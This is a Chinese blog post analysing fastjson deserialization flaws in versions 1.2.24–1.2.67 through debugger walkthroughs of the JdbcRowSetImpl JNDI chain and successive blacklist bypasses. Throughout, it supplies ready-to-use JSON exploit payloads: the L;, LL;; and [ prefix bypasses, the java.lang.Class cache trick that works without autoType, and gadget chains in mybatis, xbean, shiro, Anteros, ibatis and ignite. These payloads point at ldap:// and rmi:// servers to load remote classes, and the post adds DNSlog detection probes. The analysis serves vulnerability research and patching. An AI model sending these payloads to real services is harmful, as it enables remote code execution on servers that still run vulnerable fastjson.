fastjson 1.2.24-1.2.67 漏洞分析,附Poc分析

最新推荐文章于 2024-08-08 17:20:38 发布
最新推荐文章于 2024-08-08 17:20:38 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: Java反序列化利用链 Java代码审计 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LTianHang/article/details/130912591
版权

fastjson各版本poc研究

FastJson前置知识

fastjson反序列化JSON字符串时,会自动调用getter和setter

关于fastjson的一些特性解释

fastjson官方文档(中文)

JNI字符

Student类

package com.example.fastjson_demo.Example;

/*
 * 一个用于演示的学生类,写好了get与set方法
 * */
public class Student {

    private String name; /* 姓名 */
    private int age;     /* 年龄 */
    private String sex;  /* 性别 */

    public String getName() {
        return name;
    }
    public void setName(String name) {
        this.name = name;
    }
    public int getAge() {
        return age;
    }
    public void setAge(int age) {
        this.age = age;
    }
    public String getSex() {
        return sex;
    }
    public void setSex(String sex) {
        this.sex = sex;
    }

}

测试代码

package com.example.fastjson_demo.Example;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;
import com.alibaba.fastjson.serializer.SerializerFeature;

import java.net.MalformedURLException;
import java.net.URL;

public class Test {
    /* fastjson基本使用 */
    public static void main(String[] args) throws MalformedURLException {
        /* 序列化 */
        Student student = new Student();
        student.setAge(18);
        student.setName("keleth");
        student.setSex("男");
        Serializ(student);

        /* 反序列化 */
        String jsonStr = "{\"age\":18,\"name\":\"keleth\",\"sex\":\"男\"}";
        unSerializ(jsonStr);

    }

    private static void Serializ(Student student) {
        /*序列化为字符串并输出*/
        String jsonStr = JSONObject.toJSONString(student, SerializerFeature.WriteClassName);
        System.out.println(jsonStr);
    }

    private static void unSerializ(String jsonStr) {

        Student student = JSON.parseObject(jsonStr, Student.class);
        System.out.println(student.getAge());
        System.out.println(student.getName());
        System.out.println(student.getSex());
    }
    
    // 取得json中某个key的值
    // JSONObject.parseObject(ObjName).getString("name")
    // 还原输出json
    // JSONObject.parseObject(ObjName).toJSONString();
    // 构造poc时添加@type属性
    // JSONObject.toJSONString(student, SerializerFeature.WriteClassName)
    
}

1.2.24版本

1.2.24版本默认不开启AutoType,1.2.24版本以后都默认开启AutoType

开启代码:(低于1.2.24版本不存在getGlobalInstance()方法)

// 添加白名单
ParserConfig.getGlobalInstance().addAccept("java.lang");
// 开启AutoType
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

Poc例:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1/123","autoCommit":true}

com.sun.rowset.JdbcRowSetImpl链分析

fastjson所有的链都很巧妙,比如上面这个最开始的利用链

跟进一下,fastjson默认会调用gettersetter方法,所以直接找到

setDataSourceName()
setAutoCommit()

fastjson会对指定@type类型的类直接进行反序列化,跟进看一下readObject,没有观察到危险操作,回到上面两个方法,进行跟踪

在这里插入图片描述

setDataSourceName(),继续跟进super

在这里插入图片描述

当传入的值不为空and不为null时,赋值给dataSource

在这里插入图片描述

回到setAutoCommit(),初次链接时,conn为空,也就是会步入到else中,进行连接。

在这里插入图片描述

跟进connect()函数,看到326行直接lookup,也就是,这里的dataSourceName如果可以控制,就造成了JNDI注入漏洞。

在这里插入图片描述

在上面已经传入,并且可控,所以造成JNDI注入,达到RCE的目的。

开启Debug模式跟进一下。

在这几处分别打上断点进行调试,查看是否符合分析。

首先传入setDataSourceName()

然后进行autoCommit

由于dataSource现在已经有了值,所以直接走到下一步connect()

lookup加载dataSource造成JNDI注入

1.2.25版本-1.2.41版本

发现1.2.25版本增加了黑名单限制,autoType默认为关闭选项。

查看代码,从checkAutoType跟进

发现增加黑白名单限制,但白名单为空,应该是要手动添加


在这里插入图片描述

所以这里的绕过重点应该在类名黑名单(个人理解)

autoType关闭,检测是否在黑名单中,如果在黑名单中,报错退出。

接着往下看,这个版本的白名单默认为空。。

在这里插入图片描述

继续往下看,但是是是需要开启autoType才能利用的。

在这里插入图片描述

跟进loadClass

有意思,如果@type开头为L结尾为;,就可以绕过这个检查。

开启autoType
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

开启autoType后,最终执行的地方是在这里

com.sun.rowset.JdbcRowSetImpl链绕过限制(需开启autoType)

测试在1.2.25-1.2.41中都可使用

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://127.0.0.1/123", "autoCommit":true}

在这里插入图片描述

成功

开启autoType但未对1.2.24poc进行处理会检测黑名单,所以说这里要绕过黑名单检查

在这里插入图片描述

1.2.42版本分析

在开启AutoType的情况下,这个poc不可以使用了,来跟进看一下

{        
	"@type":"Lcom.sun.rowset.JdbcRowSetImpl;",      
	"dataSourceName":"ldap://127.0.0.1/123",      
	"autoCommit":true
}

在这里插入图片描述

黑名单设置为了HashCode匹配

在这里插入图片描述
autoType首先对传入的@type做了一次匹配,如果开头与结尾为L;,则过滤掉该字符

在这里插入图片描述

hash是取前三个字符,在这里为LL过滤一次后为L,匹配不到黑名单,仍可以绕过。

在这里插入图片描述

最后的执行点在这里,开启autoType的情况下

在这里插入图片描述

com.sun.rowset.JdbcRowSetImpl链绕过(需开启autoType)

这里的typeName为LL但是不影响,因为loadClass是递归删除的,不删完不执行。

{       
	"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;",
	"dataSourceName":"ldap://127.0.0.1/123",
	"autoCommit":true
}

在这里插入图片描述

1.2.43版本

尝试1.2.42版本POC失败
在这里插入图片描述

继续跟进分析

在这里插入图片描述

com.sun.rowset.JdbcRowSetImpl链绕过(需开启autoType)

LL;;不可以使用了

还有一个[可以用,尝试

根据错误修改POC

在这里插入图片描述

继续改

就成了。。。。。。。。6

poc通杀,1.2.24-1.2.431.2.25以上需开启autoType

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://127.0.0.1/123","autoCommit":true}

1.2.44版本-1.2.45版本

1.2.43版本poc被ban

在这里插入图片描述

跟进代码
在这里插入图片描述

开头为[的报错

开头结尾为L;的报错

现在的利用方式是开启autoType,然后找一条新的没有被检测的链子

看到网上有师傅给出了mybaits的链子

{
    "@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "properties":{
        "data_source":"rmi://127.0.0.1/"
    }
}

        <dependency>
            <groupId>org.mybatis</groupId>
            <artifactId>mybatis</artifactId>
            <version>3.4.6</version>
        </dependency>

在这里插入图片描述

在1.2.46中加入了黑名单,也就是1.2.44与1.2.45可用

在这里插入图片描述

org.apache.ibatis.datasource.jndi.JndiDataSourceFactory链

{
    "@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "properties":{
        "data_source":"ldap://127.0.0.1:1389/Basic/Command/calc"
    }
}

在这里插入图片描述

链分析

JndiDataSourceFactory jndiDataSourceFactory = new JndiDataSourceFactory();
Properties properties = new Properties();
properties.setProperty("data_source", "ldap://127.0.0.1:1389/Basic/Command/calc");
jndiDataSourceFactory.setProperties(properties);

小于等于1.2.47版本-无需开启autoType通杀

利用Class.class,突破autoType限制,1.2.47以下通杀

通杀低版本POC

可是默认autoType是关闭的,这里在网上看到一个大师傅的poc

https://github.com/safe6Sec/Fastjson

fastjson 1.2.9-1.2.47

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://127.0.0.1:8081/123.txt",
        "autoCommit":true
    }
}

2023-05-26 23:58 溜了,明天继续分析

应该是利用Class.class类比对的那里,来绕过autoType与黑名单限制(菜鸡勿喷)

使用Class突破autoType黑白名单限制

然后@type第一个类主体是Class,会进入到特殊的Class.class判断

在这里插入图片描述

然后会将strVal的类,put到这个mappings中,这样的话,com.sun.rowset.JdbcRowSetImpl就被加载到了mappings,也就是缓存中,

在这里插入图片描述

checkAutoType中,可以通过这个函数,检查class是否在基类中,因为在上面已经将恶意类加载到mappings中,所以这里条件符合,就可以通过autoType检查。

在这里插入图片描述

所以,构造成功,绕过autoType与黑名单限制

{
    "a":{
        "@type":"java.lang.Class",
        "val":"Lcom.sun.rowset.JdbcRowSetImpl;"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://127.0.0.1:8081/123.txt",
        "autoCommit":true
    }
}

在这里插入图片描述

其实这里是不用绕过的,直接用就可以,因为没有涉及到黑名单校验。

1.2.62版本-1.2.67版本

1.2.62版本,Class不会再往mappings中加载val,也就是上面的通杀poc不可用了


在这里插入图片描述

如果不为true,则不会缓存,默认为false。

利用链分析

黑名单绕过exp,需开启autoType

org.apache.xbean.propertyeditor.JndiConverter

1.2.62可用

<dependency>
	<groupId>org.apache.xbean</groupId>
	<artifactId>xbean-reflect</artifactId>
	<version>3.4</version>
</dependency>

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1099/exploit"}";

JndiConverter->父类AbstractConverter
	setAsText(String text)->
		toObject(String text)->
			toObjectImpl(String var1)->
				JndiConverter.toObjectImpl(String text)->
					lookup();
org.apache.shiro.jndi.JndiObjectFactory

1.2.66可用

<dependency>
    <groupId>org.apache.shiro</groupId>
    <artifactId>shiro-core</artifactId>
    <version>1.7.1</version>
</dependency>

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}

br.com.anteros.dbcp.AnterosDBCPConfig

1.2.66可用

<dependency>
	<groupId>br.com.anteros</groupId>
	<artifactId>Anteros-Core</artifactId>
	<version>1.2.6</version>
</dependency>
<dependency>
	<groupId>br.com.anteros</groupId>
	<artifactId>Anteros-DBCP</artifactId>
	<version>1.0.1</version>
</dependency>

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}

br.com.anteros.dbcp.AnterosDBCPConfig


在这里插入图片描述
lookup执行

com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig

1.2.66可用

<dependency>
	<groupId>org.apache.ibatis</groupId>
	<artifactId>ibatis-sqlmap</artifactId>
	<version>2.3.4.726</version>
</dependency>

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1389/Calc"}}

在这里插入图片描述

org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup

1.2.67可用

<dependency>
	<groupId>org.apache.ignite</groupId>
	<artifactId>ignite-core</artifactId>
	<version>2.11.0</version>
</dependency>
<dependency>
	<groupId>org.apache.ignite</groupId>
	<artifactId>ignite-jta</artifactId>
	<version>2.11.0</version>
</dependency>

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", "jndiNames":["ldap://127.0.0.1:1389/123"], "tm": {"$ref":"$.tm"}}

        CacheJndiTmLookup cacheJndiTmLookup = new CacheJndiTmLookup();
        List<String> list = new ArrayList<>();
        list.add("ldap://127.0.0.1:1389/Basic/Command/calc");
        cacheJndiTmLookup.setJndiNames(list);
        cacheJndiTmLookup.getTm();
        String jsonStr = JSONObject.toJSONString(cacheJndiTmLookup, SerializerFeature.WriteClassName);
        System.out.println(jsonStr);

父类

调用无参方法

"tm": {"$ref":"$.tm"}

1.2.68以后版本开新文章分析。

显示具体版本号POC

{"@type":"[com.alibaba.fastjson.parser.ParserConfig"[,"12":"123",}

一些绕过的写法

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}

{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}

Set[{"@type":"java.net.URL","val":"dnslog"}]

参考文章

1.2.25-1.2.47版本分析

1.2.68版本分析

FastJson Hash黑名单

FastJson涨姿势Poc合集

关于fastjson的一些特性解释

fastjson官方文档(中文)

JNI字符

keleth
关注
专栏目录
Fastjson-Scanner:burp扩展以查找在哪里使用fastjson
03-20
Fastjson-扫描仪 闲来无事,在家写了个fastjson初始组件检测,用于探测定位是否使用fastjson。 使用的poc如下: fastjson_poc = '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' % val 优点 不仅能够探测POST中的json数据,还能够判断GET中的json数据,支持urlencode,urldecode等。 两种数据对应格式如下: 得到: GET /?json={"fastjson":"example"} 邮政: POST / ... {"fastjson":"example"} 使用方法 导入插件即可重新开始使用,对数据包进行被动扫描,由于使用的是burp自带的dnslog,所以稍微有些电脑延迟,代码里写了sleep 10来获取结果。 当导入数据包后,在burp内可以看到Fastjson
Fastjson反序列化漏洞利用原理和POC
u012990687的专栏
11-30 1万+
0x01 前言 FastJson是开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到Java Bean。Fastjson应用范围非常广,在github上star数超过22k。2017年3月15日,fastjson官方主动爆出fastjson1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。2020年6月1日 fastjson爆发新的反序列化远程代码执行漏洞,fastjso
Java代码审计-fastjson反序列化漏洞分析
最新发布
qq_44780157的博客
08-08 1967
Fastjson反序列化漏洞各个版本的原理浅析。
渗透测试 | FastJson漏洞原理与复现
m0_60571990的博客
03-09 1418
渗透测试 | FastJson漏洞原理与复现
fastjson远程代码执行漏洞
网安君的博客
03-29 5718
Fastjson 1.2.24 远程代码执行漏洞 漏洞说明 FastJson库是Java的一个Json库,其作用是将Java对象转换成json数据来表示,也可以将json数据转换成Java对象。在2017年3月15日,fastjson官方主动爆出fastjson1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 前提条件 开启autotype 影响范围 fastjson 1.2.22-1.2.24 jdk 1.7,1.8版本 漏洞复现 由于Fastj
代码审计-Fastjson各版本漏洞分析(上)
dzqxwzoe的博客
08-03 1673
最先出现问题的Fastjson 1.2.24反序列化漏洞已经分析过了,产生漏洞的原理也差不多理解了。
fastjson-1.2.76.jar
06-29
fastjson-1.2.76.jar
fastjson-1.2.70.jar.zip
03-21
《深入解析Fastjson-1.2.70.jar:Java高效JSON处理库》 Fastjson是阿里巴巴开源的一款高性能的JSON库,它为Java开发者提供了一种快速、灵活且功能强大的解决方案,用于处理JSON数据。Fastjson-1.2.70.jar是其在1.2....
fastjson-1.2.83.jar下载
04-18
fastjson-1.2.83.jar下载,fastjson是阿里巴巴的开源JSON解析库,可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也支持从JSON字符串反序列化到JavaBean。fastjson采用全新的JSON解析算法,运行速度极快...
fastjson-1.2.72-API文档-中文版.zip
06-06
赠送jar包:fastjson-1.2.72.jar; 赠送原API文档:fastjson-1.2.72-javadoc.jar; 赠送源代码:fastjson-1.2.72-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.72.pom; 包含翻译后的API文档:fastjson-1.2....
fastjson-1.2.78-API文档-中文版.zip
05-09
赠送jar包:fastjson-1.2.78.jar; 赠送原API文档:fastjson-1.2.78-javadoc.jar; 赠送源代码:fastjson-1.2.78-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.78.pom; 包含翻译后的API文档:fastjson-1.2....
FastJson详解
从基础到源码解析的学习记录
07-15 7797
FastJson 是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将JavaBean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。Fastjson 的优点速度快fastjson相对其他JSON库的特点是快从2011年fastjson发布1.1.x版本之后,其性能从未被其他Java实现的JSON库超越使用广泛fastjson在阿里巴巴大规模使用,在数万台服务器上部署,fastjson在业界被广泛接受。
FastJson远程命令执行漏洞学习笔记
m0_73257876的博客
09-04 704
fastjson漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类执行代码。笔记只做学习记录分享。如有错误,请大家批评指正!
fastjson 系列漏洞
SHELLCODE_8BIT的博客
11-14 2423
jackson 和 fastjson 在序列化的时候,先利用反射找到对象类的所有 get 方法,接下来去 get,然后小写化,作为 json 的每个 key 值,而 get 方法的返回值作为 value。接下来再反射 field,添加到 json 中。
老生常谈的fastjson安全问题,从实战深入反序列化漏洞原理
2201_75353421的博客
06-20 2533
反序列化是java安全er避不开的技能点,也是非常难的一个点。这里我就先从我实战中遇到最多也是自己最熟悉的fastjson开始,这个漏洞老生长谈了,不过只要遇到就真是一个很好的点了。这里我先从效果开始再转战到原理,因为如果不懂代码,上来就分析代码就会让人望而却步。直接从漏洞利用开始,溯源到原理反倒是我这种非安全研究er的最好学习方式。
建议将com.alibaba:fastjson升级至1.2.83
热门推荐
闫玉林的博客
02-25 1万+
【代码】存在安全漏洞,建议将com.alibaba:fastjson升级至1.2.83。
FastJson-安全
xlsj雪松的博客
01-03 4229
1 FastJson介绍 FastJson的主要功能就是将Java对象序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。把一个Java对象转换成字符串,有两种选择: 1)基于属性 fastjson引入了AutoType,即在序列化的时候使用@type字段,标注了类对应的原始类型,方便在反序列化的时候定位到具体类型。 2)基于setter/getter 当我们要对他进行序列化的时候,fastjson会扫描其中的getter方法,即找到getName和getFrui
安全问题我们需要重视,立刻升级fastjson2
詹Sir的博客
06-13 1179
fastjson、jackson 都支持 AutoType 功能,这个功能在序列化的 JSON 字符串中带上类型信息,在反序列化时,不需要传入类型,实现自动类型识别。很多时候,root对象是可以知道类型的,里面的对象字段是基类或者不确定类型,这个时候不输出root对象的类型信息,可以减少序列化结果的大小,也能提升反序列化的性能。fastjson2 在性能和安全上都得到了很好的提升,开源字节开快速开发平台已经完成了升级,代码改动较大,fork了我们仓库的同学请及时更新,安全无小事,请慎重。
Fastjson各版本漏洞分析(下)
xxwn200301的博客
04-12 1462
1.2.44中对[进行了判断,我们用1.2.43的POC,然后下个JSONException的异常断点,看看是怎么判断的运行后,在com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String,>, int)成功拦截分析一下,发现如果开头是[就直接抛出异常那再看看1.2.41里面的绕法呢,前面加个L,后面加个;,发现会检查结尾是否为;,是的话也抛出异常。
fastjson-1.2.83.jar 下载
12-08
要下载fastjson-1.2.83.jar,可以按照以下步骤进行操作: 1. 打开一个网络浏览器,比如Google Chrome、Mozilla Firefox等。 2. 在浏览器的搜索栏中,输入“fastjson-1.2.83.jar下载”。 3. 从搜索结果中选择一个可靠的下载来源,比如官方网站或其他知名的软件下载网站。 4. 进入选择的下载来源网站后,找到与fastjson-1.2.83.jar相关的下载链接或按钮。 5. 点击下载链接或按钮,开始下载fastjson-1.2.83.jar文件。 6. 下载完成后,可以在浏览器默认的下载文件夹中找到fastjson-1.2.83.jar。 7. 如果希望保存到其他位置,可以在浏览器的下载页面中选择目标文件夹进行保存。 8. 下载完成后,可以通过文件管理器进入所保存的文件夹,找到并使用fastjson-1.2.83.jar文件。 需要注意的是,在下载任何文件时,应确保选择可信任的来源,以避免下载到恶意软件或病毒。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值